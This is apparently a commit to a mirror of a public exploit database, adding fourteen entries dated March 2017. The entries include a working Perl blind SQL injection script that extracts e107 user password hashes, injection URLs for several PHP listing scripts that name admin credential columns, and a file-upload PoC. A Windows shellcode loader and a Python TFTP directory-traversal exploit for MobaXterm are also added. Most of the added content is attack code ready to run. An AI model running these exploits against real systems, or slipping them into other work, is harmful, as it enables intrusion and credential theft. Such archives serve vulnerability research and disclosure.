bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-03-12

Browse source 
14 new exploits

MobaXterm Personal Edition 9.4 - Directory Traversal

Windows x86 - Hide Console Window Shellcode (182 bytes)
e107 <= 2.1.4 - 'keyword' Blind SQL Injection
Domain Marketplace Script - SQL Injection
Global In - SQL Injection
Global In - Arbitrary File Upload
Vanelo - SQL Injection
Mirage - SQL Injection
Pet Listing Script 3.0 - SQL Injection
Property Listing Script 3.1 - SQL Injection
Travel Tours Script 2.0 - SQL Injection
Yacht Listing Script 2.0 - SQL Injection
Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection
PHP Forum Script 3.0 - SQL Injection
This commit is contained in:
Offensive Security 2017-03-12 05:01:18 +00:00
parent f2327bc214
commit d36dc6b95d
15 changed files with 736 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -15313,6 +15313,7 @@ id,file,description,date,author,platform,type,port
41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15938,6 +15939,7 @@ id,file,description,date,author,platform,type,port
41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37493,3 +37495,15 @@ id,file,description,date,author,platform,type,port
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0
41580,platforms/php/webapps/41580.pl,"e107 <= 2.1.4 - 'keyword' Blind SQL Injection",2017-03-09,StAkeR,php,webapps,0
41582,platforms/php/webapps/41582.txt,"Domain Marketplace Script - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
41583,platforms/php/webapps/41583.txt,"Global In - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
41584,platforms/php/webapps/41584.txt,"Global In - Arbitrary File Upload",2017-03-11,"Ihsan Sencan",php,webapps,0
41585,platforms/php/webapps/41585.txt,"Vanelo - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
41593,platforms/php/webapps/41593.txt,"Mirage - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
41586,platforms/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
41587,platforms/php/webapps/41587.txt,"Property Listing Script 3.1 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
41588,platforms/php/webapps/41588.txt,"Travel Tours Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
41589,platforms/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

265
platforms/php/webapps/41580.pl Executable file
View file

@ -0,0 +1,265 @@
#!/usr/bin/perl
#
#
# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit
#
# --------------------------------------------------------------------------
# [*] Discovered by staker - staker[at]hotmail[dot]it
# [*] Discovered on 09/03/2017
# [*] Site Vendor: http://www.e107.org
# [*] BUG: Blind SQL Injection
# --------------------------------------------------------------------------
#
#
# Description
# -------------------------------------------------------------------------
# e107 contains one flaw that allows an attacker to carry out an SQL
# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script
# not properly saniting user-supplied input to the "keyword" POST variable
# This may allow an attacker to inject or manipulate sql queries in
# the backend database regardless of php.ini settings
# -------------------------------------------------------------------------
# SHORT EXPLANATION
# -----------------------------------
#
# FILE: "e107_handlers/core_functions.php"
#
# 76. function vartrue(&$val, $default='')
# 77. {
# 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database
# 79. return $default;
# 80.}
#
# ----------------------------------
#
# FILE: "e107/e107_plugins/pm/pm.php"
#
#
# 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function.
# 36. {
# 37. pm_user_lookup();
# 38.}
#
#
#
# 615. function pm_user_lookup()
# 616. {
# 617. $sql = e107::getDb();
# 618.
# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized
# 620. if($sql->gen($query))
# 621. {
# 622. echo '[';
# 623 while($row = $sql->fetch())
# 624. {
# 625. $u[] = "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}";
# 626. }
# 627.
# 628. echo implode(",",$u);
# 629. echo ']';
# -----------------------------------
#
#
# use your brain..
#
# Greetz to: Warwolfz Crew,
# meh, Dante90, SHADES MASTER and nexen
#
# -- 0gay --
#
# -----------------------------------
# YOUR MOM IS NOT SAFE ANYMORE!!
# CALL HER!!
# -----------------------------------
use strict;
use IO::Socket::INET;
use LWP::UserAgent;
my ($URL,$uid) = @ARGV;
my @chars = (8..122);
my ($i,$ord,$hash) = (1,undef,undef);
if (@ARGV != 2) { usage(); }
$URL = parse::URL($URL);
syswrite (STDOUT,"[-] Crypted Password: ");
for ($i=0;$i<=60;$i++)
{
foreach $ord (@chars)
{
if (e107::Query(sql($i,$ord),$URL) == 666 )
{
syswrite (STDOUT,chr($ord));
$hash .= chr($ord);
last;
}
if ($i == 2 and not defined $hash)
{
syswrite (STDOUT,"\n[-] Exploit Failed");
exit;
}
}
}
if (length($hash) == 60) {
die "\[-]Exploit Successfully";
}
else {
die "\n[-] Exploit Failed";
}
sub e107::Query
{
# 1st parameter, sql query
# 2nd parameter, e107 website
my ($query,$URL) = @_;
my $response = undef;
my $lwp = new LWP::UserAgent;
$lwp->default_header('User-Agent' => 'Lynx (textmode)');
$response = $lwp->post($URL."/pm/",
[
keyword => $query
]) or die $!;
if ($response->content =~ /caption/) {
return 666;
}
else {
return 0;
}
}
sub parse::URL
{
my $string = shift @_ || die($!);
if ($string !~ /^http:\/\/?/i) {
$string = 'http://'.$string;
}
return $string;
}
sub sql
{
# 1st parameter, an e107's userid
# 2nd parameter substring number
# 3rd parameter charcode number
my ($i,$j,$sql) = (shift,shift,undef);
$sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#";
return $sql;
}
sub e107::Cookies
{
my ($username,$password) = @_;
my ($packet,$content);
my $host = "127.0.0.1"; # Valid Host (insert it manually)
my $path = "/e107/"; # Valid e107 path (insert it manually)
my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In";
my $socket = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) or die $!;
$packet .= "POST ".$path."/login.php HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: Lynx (textmode)\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length:".length($data)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet.= $data;
$socket->send($packet);
while (<$socket>) {
$content .= $_;
}
if ($content =~ /Set-Cookie: (.+?)/) {
return $1;
}
else {
die("[-] Login Failed..\n");
}
# This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit.
# it works without log-in, but if you got some trouble, try to use this one.
# e107::Login('YOUR USERNAME','YOUR PASSWORD');
}
sub usage() {
print "[*---------------------------------------------------------*]\n".
"[* e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit *]\n".
"[*---------------------------------------------------------*]\n".
"[* Usage: perl web.pl [host] [uid] *]\n".
"[* *]\n".
"[* Options: *]\n".
"[* [host] insert a valid host *]\n".
"[* [uid] insert a userid *]\n".
"[*---------------------------------------------------------*]\n";
exit;
}

26
platforms/php/webapps/41582.txt Executable file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Domain Marketplace Script - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: http://scripteen.com/
# Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html
# Demo: http://dwm.domainauctionsscript.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?page=websites_for_sale&cat=[SQL]
# users :userId
# users :data
# users :payment_date
# users :expiration_date
# users :username
# users :password
# users :nume
# users :adresa
# Etc..
# # # # #

26
platforms/php/webapps/41583.txt Executable file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Global In – A LinkedIn Clone - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.techbizstudio.com/
# Software: https://www.techbizstudio.com/product/linkedin-clone/
# Demo: https://www.techbizstudio.com/demo/globalin/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/hsearch?accept=true&fnm=[SQL]&lnm=[SQL]
# http://localhost/[PATH]/search?type=company&key=[SQL] [Login as regular user]
# http://localhost/[PATH]/search?type=people&key=[SQL]&fnm=[SQL]&lnm=[SQL]&title=[SQL]&com=[SQL]&sc=[SQL]&co=[SQL]&industry=[SQL] [Login as regular user]
# tb_admin :id
# tb_admin :username
# tb_admin :email
# tb_admin :password
# tb_admin :ip_address
# tb_admin :is_active
# Etc..
# # # # #

21
platforms/php/webapps/41584.txt Executable file
View file

@ -0,0 +1,21 @@
# # # # #
# Exploit Title: Global In - Arbitrary File Upload
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.techbizstudio.com/
# Software: https://www.techbizstudio.com/product/linkedin-clone/
# Demo: https://www.techbizstudio.com/demo/globalin/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# Login as regular user
# http://localhost/[PATH]/dashboard
# Upload Photo / File.php
# http://localhost/[PATH]/post-images/1113330455_File.php
# Etc..
# # # # #

19
platforms/php/webapps/41585.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Vanelo Wanelo Clone - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.zoplay.com/
# Software: https://www.zoplay.com/web/trending-marketplace-website/
# Demo: http://wanelo.zoplay.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/shopby/IhsanSencan?q=[SQL]
# Duplicate entry 'waneloclone
# Etc..
# # # # #

18
platforms/php/webapps/41586.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Pet Listing Script v3.0 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/pet-listing-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&year_from=2017[SQL]&year_to=2017[SQL]
# Etc..
# # # # #

18
platforms/php/webapps/41587.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Property Listing Script v3.1 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/property-listing-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=pls&front=1&lid=1
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1[SQL]&max_bedrooms=1[SQL]&min_bathrooms=1[SQL]&max_bathrooms=2[SQL]
# Etc..
# # # # #

18
platforms/php/webapps/41588.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Travel Tours Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/travel-tours-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&sortby=stars&direction=[SQL]&listing_search=1&type=[SQL]&rating_from=[SQL]&rating_to=[SQL]&price_from=[SQL]&price_to=[SQL]
# Etc..
# # # # #

18
platforms/php/webapps/41589.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Yacht Listing Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/yacht-listing-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=yls&front=1&lid=1
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&listing_search=1&min_year=1948[SQL]&max_year=2017[SQL]&min_loa=6[SQL]&max_loa=20[SQL]&min_length=25[SQL]&max_length=150[SQL]&min_beam=20[SQL]&max_beam=150[SQL]
# Etc..
# # # # #

18
platforms/php/webapps/41590.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Yellow Pages Script v3.2 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/yellow-pages-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=yps&front=1&lid=1
# Version: 3.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&category_id=[SQL]
# Etc..
# # # # #

18
platforms/php/webapps/41591.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: PHP Forum Script v3.0 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/php-forum-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=pfs&front=1&lid=1
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC
# Etc..
# # # # #

19
platforms/php/webapps/41593.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Mirage Fancy Clone - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.zoplay.com/
# Software: https://www.zoplay.com/web/multi-vendor-clone-website/
# Demo: http://fancyclone.zoplay.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/shopby/IhsanSencan?c=[SQL]
# Duplicate entry 'fancyclone
# Etc..
# # # # #

113
platforms/win_x86/shellcode/41581.c Executable file
View file

@ -0,0 +1,113 @@
/*
MIT License
Copyright (c) 2017 Ege Balcı
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
# Win32 - Hide Console Window Shellcode (182 BYTES)
# Date: [11.03.2017]
# Author: [Ege Balcı]
# Tested on: [Win XP/Vista/7/8/8.1/10]
@egeblc
------------------------------------------------------------------
This shellcode will hide the console window...
[BITS 32]
[ORG 0]
pushad ; Save all register to stack
pushfd ; Save all flags to stack
cld
call Start
%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project
Start:
pop ebp ; Pop the address of SFHA
push 0x00000000 ; Push the byte 'user32' ,0,0
push 0x00003233 ; ...
push 0x72657375 ; ...
push esp ; Push a pointer to the "user32" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "user32" )
add esp,0x0C ; Clear the stack
push 0xCE726E89 ; hash("user32.dll", "GetConsoleWindow")
call ebp ; GetConsoleWindow();
push 0x00000000 ; 0
push eax ; Console window handle
push 0x6E2EEBC2 ; hash(User32.dll, ShowWindow)
call ebp ; ShowWindow(HANDLE,SW_HIDE);
popfd ; Pop back all saved flags
popad ; Pop back all saved registers
ret ; Return
*/
#include <windows.h>
#include <stdio.h>
unsigned char Shellcode[] = {
0x60, 0x9c, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31,
0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b,
0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c,
0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57,
0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48,
0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3,
0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf,
0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d,
0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c,
0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89,
0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f,
0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x6a, 0x00, 0x68, 0x33, 0x32,
0x00, 0x00, 0x68, 0x75, 0x73, 0x65, 0x72, 0x54, 0x68, 0x4c, 0x77, 0x26,
0x07, 0xff, 0xd5, 0x83, 0xc4, 0x0c, 0x68, 0x89, 0x6e, 0x72, 0xce, 0xff,
0xd5, 0x6a, 0x00, 0x50, 0x68, 0xc2, 0xeb, 0x2e, 0x6e, 0xff, 0xd5, 0x9d,
0x61, 0xc3
};
void ExecuteShellcode();
int main(int argc, char const *argv[])
{
ExecuteShellcode();
getchar();
return 0;
}
void ExecuteShellcode(){
char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(BUFFER, Shellcode, sizeof(Shellcode));
(*(void(*)())BUFFER)();
}

125
platforms/windows/remote/41592.txt Executable file
View file

@ -0,0 +1,125 @@
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt
[+] ISR: ApparitionSec
Vendor:
=====================
mobaxterm.mobatek.net
Product:
===============================
MobaXterm Personal Edition v9.4
Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more.
Vulnerability Type:
=====================================
Path Traversal Remote File Disclosure
CVE Reference:
==============
CVE-2017-6805
Security Issue:
================
Remote attackers can use UDP socket connection to TFTP server port 69 and send Read request, to retrieve otherwise protected files using
directory traversal attacks e.g. ../../../../Windows/system.ini
Start MobaXterm TFTP server which listens on default TFTP port 69.
c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini
Transfer successful: 219 bytes in 1 second(s), 219 bytes/s
c:\xampp\htdocs>type system.ini
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Victim Data located on: 127.0.0.1
POC URL:
=============================
https://vimeo.com/207516364
Exploit:
==========
import sys,socket
print 'MobaXterm TFTP Directory Traversal 0day Exploit'
print 'Read Windows/system.ini'
print 'hyp3rlinx \n'
HOST = raw_input("[IP]>")
FILE = 'Windows/system.ini'
PORT = 69
PAYLOAD = "\x00\x01" #TFTP Read
PAYLOAD += "../" * 4 + FILE + "\x00" #Read system.ini using directory traversal
PAYLOAD += "netascii\x00" #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
print "Victim Data located on : %s " %(HOST)
print out.strip()
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: No Reply
March 10, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx